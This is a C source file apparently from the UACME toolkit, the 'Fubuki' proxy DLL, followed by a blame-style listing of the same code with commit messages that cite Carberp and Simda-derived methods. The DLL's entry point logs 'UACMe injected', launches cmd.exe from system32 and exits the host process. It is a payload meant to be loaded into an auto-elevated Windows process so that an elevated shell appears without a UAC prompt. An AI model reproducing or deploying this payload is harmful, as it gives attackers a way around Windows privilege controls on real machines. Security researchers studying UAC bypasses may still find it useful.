UACME/Source/Fubuki/dllmain.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2015
*
*  TITLE:       DLLMAIN.C
*
*  VERSION:     1.60
*
*  DATE:        20 Apr 2015
*
*  Proxy dll entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition

#include <Windows.h>
#include "..\Shared\minirtl.h"

/*
* DummyFunc
*
* Purpose:
*
* Stub for fake exports.
*
*/
VOID WINAPI DummyFunc(
	VOID
	)
{
}

/*
* DllMain
*
* Purpose:
*
* Proxy dll entry point, start cmd.exe and exit immediatelly.
*
*/
BOOL WINAPI DllMain(
	_In_ HINSTANCE hinstDLL,
	_In_ DWORD fdwReason,
	_In_ LPVOID lpvReserved
	)
{
	DWORD					cch;
	TCHAR					cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1];
	STARTUPINFO				startupInfo;
	PROCESS_INFORMATION		processInfo;

	UNREFERENCED_PARAMETER(hinstDLL);
	UNREFERENCED_PARAMETER(lpvReserved);

	if (fdwReason == DLL_PROCESS_ATTACH) {
		OutputDebugString(TEXT("UACMe injected, Fubuki at your service.\r\n"));

		RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
		RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
		startupInfo.cb = sizeof(startupInfo);
		GetStartupInfo(&startupInfo);

		RtlSecureZeroMemory(sysdir, sizeof(sysdir));
		cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
		if ((cch != 0) && (cch < MAX_PATH)) {
			RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
			_strcpy(cmdbuf, sysdir);
			_strcat(cmdbuf, TEXT("cmd.exe"));

			if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
				sysdir, &startupInfo, &processInfo))
			{
				CloseHandle(processInfo.hProcess);
				CloseHandle(processInfo.hThread);
			}
		}
		ExitProcess(0);
	}
	return TRUE;
}
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`/*******************************************************************************`
			`*`
			`* (C) COPYRIGHT AUTHORS, 2014 - 2015`
			`*`
			`* TITLE: DLLMAIN.C`
			`*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* VERSION: 1.60`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* DATE: 20 Apr 2015`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
			`* Proxy dll entry point.`
			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`

v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`//disable nonmeaningful warnings.`
			`#pragma warning(disable: 4005) // macro redefinition`

v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`#include <Windows.h>`
			`#include "..\Shared\minirtl.h"`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`/*`
			`* DummyFunc`
			`*`
			`* Purpose:`
			`*`
			`* Stub for fake exports.`
			`*`
			`*/`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`VOID WINAPI DummyFunc(`
			`VOID`
			`)`
			`{`
			`}`

v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`/*`
			`* DllMain`
			`*`
			`* Purpose:`
			`*`
			`* Proxy dll entry point, start cmd.exe and exit immediatelly.`
			`*`
			`*/`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`BOOL WINAPI DllMain(`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`_In_ HINSTANCE hinstDLL,`
			`_In_ DWORD fdwReason,`
			`_In_ LPVOID lpvReserved`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`)`
			`{`
			`DWORD cch;`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`TCHAR cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1];`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`STARTUPINFO startupInfo;`
			`PROCESS_INFORMATION processInfo;`

			`UNREFERENCED_PARAMETER(hinstDLL);`
			`UNREFERENCED_PARAMETER(lpvReserved);`

			`if (fdwReason == DLL_PROCESS_ATTACH) {`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`OutputDebugString(TEXT("UACMe injected, Fubuki at your service.\r\n"));`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00
			`RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));`
			`RtlSecureZeroMemory(&processInfo, sizeof(processInfo));`
			`startupInfo.cb = sizeof(startupInfo);`
			`GetStartupInfo(&startupInfo);`

			`RtlSecureZeroMemory(sysdir, sizeof(sysdir));`
			`cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);`
			`if ((cch != 0) && (cch < MAX_PATH)) {`
			`RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`_strcpy(cmdbuf, sysdir);`
			`_strcat(cmdbuf, TEXT("cmd.exe"));`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00
			`if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,`
			`sysdir, &startupInfo, &processInfo))`
			`{`
			`CloseHandle(processInfo.hProcess);`
			`CloseHandle(processInfo.hThread);`
			`}`
			`}`
			`ExitProcess(0);`
			`}`
			`return TRUE;`
			`}`